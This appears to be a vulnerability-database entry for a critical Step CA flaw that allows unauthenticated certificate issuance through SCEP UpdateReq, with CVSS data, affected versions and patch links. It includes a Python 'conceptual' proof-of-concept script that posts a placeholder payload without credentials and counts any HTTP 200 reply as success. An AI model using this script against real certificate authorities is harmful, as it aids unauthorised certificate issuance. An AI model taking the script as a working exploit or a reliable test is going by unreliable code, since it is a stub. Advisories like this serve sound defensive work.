Security Vulnerability Report
CVE-2026-30836 CVSS 10.0 CRITICAL

Published: 2026-03-19 21:17:10
Last Modified: 2026-04-27 13:41:55

Description

Step CA is an online certificate authority for secure, automated certificate management for DevOps. Versions 0.30.0-rc6 and below do not safeguard against unauthenticated certificate issuance through the SCEP UpdateReq. This issue has been fixed in version 0.30.0.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:smallstep:step-ca:*:*:*:*:*:go:*:* - VULNERABLE (all versions before 0.30.0)
cpe:2.3:a:smallstep:step-ca:0.30.0:rc1:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc2:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc3:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc4:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc5:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc6:*:*:*:go:*:* - VULNERABLE
Step CA <= 0.30.0-rc6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import base64

# Conceptual Proof of Concept for CVE-2026-30836
# Demonstrates the lack of authentication in SCEP UpdateReq

target_host = "https://step-ca.example.com"
scep_endpoint = "/scep"


def generate_malicious_scep_request():
    # In a real exploit, this would be a valid PKCS#7 or CSR structure
    # wrapped specifically for the SCEP UpdateReq operation.
    mock_payload = "<Malicious_SCEP_UpdateReq_Content>"
    return base64.b64encode(mock_payload.encode()).decode()


def exploit():
    print(f"[*] Targeting {target_host}{scep_endpoint}...")
    headers = {"Content-Type": "application/x-pki-message"}
    data = {
        "operation": "PKIOperation",
        "message": generate_malicious_scep_request(),
    }
    try:
        # Note: No authentication token or credentials are sent
        response = requests.post(
            target_host + scep_endpoint, data=data, headers=headers, verify=False
        )
        if response.status_code == 200:
            print("[+] Success! Certificate issued without authentication.")
            print(f"[+] Response: {response.text[:100]}...")
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    exploit()

References

https://github.com/smallstep/certificates/commit/e6da031d5125cfd99fe9a26f74bb41e4dacca4ef - Patch
https://github.com/smallstep/certificates/releases/tag/v0.30.0-rc7 - Release Notes
https://github.com/smallstep/certificates/security/advisories/GHSA-q4r8-xm5f-56gw - Vendor Advisory
